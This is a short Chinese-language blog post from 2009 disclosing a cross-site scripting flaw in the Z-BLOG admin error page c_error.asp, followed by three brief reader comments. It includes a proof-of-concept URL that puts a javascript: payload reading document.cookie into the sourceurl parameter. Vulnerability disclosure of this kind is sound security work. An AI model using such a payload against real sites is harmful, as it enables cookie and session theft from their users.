首页 > 网络安全 > Z-BLOG XSS Vulnerabilities

Z-BLOG XSS Vulnerabilities

2009年6月12日 发表评论 阅读评论

漏洞描述:
Z-BLOG后台登陆错误信息显示文件c_error.asp,虽然对跳转URL的参数sourceurl进行了编码,但没有判断链接头部,执行了javascript伪协议,造成跨站脚本漏洞。
漏洞测试:

http://www.woyigui.cn/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Z-BLOG XSS Vulnerabilities
本文地址:http://www.woyigui.cn/2009/06/12/Z-BLOG-XSS-Vulnerabilities/

分类: 网络安全 标签:
  1. hysia
    2009年6月13日11:16 | #1

    你的修复了?
    测试没弹出 cookies

    [回复]

  2. eee
    2009年6月16日10:05 | #2

    stupid咳 我以为是..

    [回复]

  3. 2009年6月18日12:22 | #3

    hysia真是傻的可爱……woyigui的博客是bo-blog吧……

    [回复]

  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*